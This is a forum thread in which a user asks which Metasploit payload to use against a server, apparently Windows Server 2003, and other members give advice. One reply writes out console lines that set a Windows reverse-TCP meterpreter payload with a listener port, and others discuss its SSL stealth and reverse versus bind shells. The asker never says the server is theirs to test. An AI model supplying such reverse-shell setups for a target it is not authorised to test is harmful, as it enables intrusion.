a question about metasploit

This topic contains 8 replies, has 6 voices, and was last updated by  nytfox 7 years, 9 months ago.

  • #7027
     midnight monster 

    Hello there!
    I have a problem with Metasploit: I don’t know which of the payloads is best for my exploit (I know the server vulnerability and I am sure about my exploit), and when I use the “show payloads” command I see a lot of compatible payloads. Please help me find the best payload.

  • #43613

    The “best” payload to use will depend on your scenario.


  • #43614

    Try each one and see which works best for you! That’s part of the fun of Metasploit. For each one that doesn’t work try to find out why!


  • #43615

    As previously mentioned we don’t know your environment, or your target for that matter.

    If it’s within a local lab environment, targeting a Windows system, give the reverse meterpreter a try…

    set payload windows/meterpreter/reverse_tcp
    set lhost
    set lport 8888

  • #43616
     midnight monster 

    Oh Steve, are you kidding!! It has a hundred compatible payloads and it takes a lot of time for me.

  • #43617

    @midnight monster wrote:

    Oh Steve, are you kidding!! It has a hundred compatible payloads and it takes a lot of time for me.

    OK. What is the server OS and vulnerability? If it’s Windows then Meterpreter (as mentioned by BILLV) is always a favorite of mine.


  • #43618

    On Windows, a meterpreter is always better because all Windows post modules support it (plus tons of features). It also communicates in SSL, so that adds a bit more stealth. On Linux though, it’s a different story; honestly you’re probably better off with a non-meterpreter shell, because the Linux meterpreter isn’t as good as the Windows one.

    reverse vs bind… come to think about it, I almost never use bind these days on a machine behind a firewall.  But people do use bind shells.

    By the way, when you select an exploit, and do “show payloads” — that will only show all the payloads compatible with that particular exploit.  If you’re testing a web app exploit, keep in mind php/exec might not return an output (even though the command ran successfully).

    If you’re still clueless about which payload to use, just use a reverse meterpreter like everybody else has been recommending.

    Lastly, perhaps you should consider asking Metasploit questions on #metasploit in freenode, so the actual Metasploit dev team can answer your questions more quickly.

    And yes… I did sign up for an account here just to answer your question.

  • #43619
     midnight monster 

    Thank you msfsinn3r, your info was very useful for me.
    My server is Windows Server 2003.
    And thanks a lot.

  • #43620

    btw you can use the search command to get selected exploits, like “search smb”. Try it and lemme know 🙂
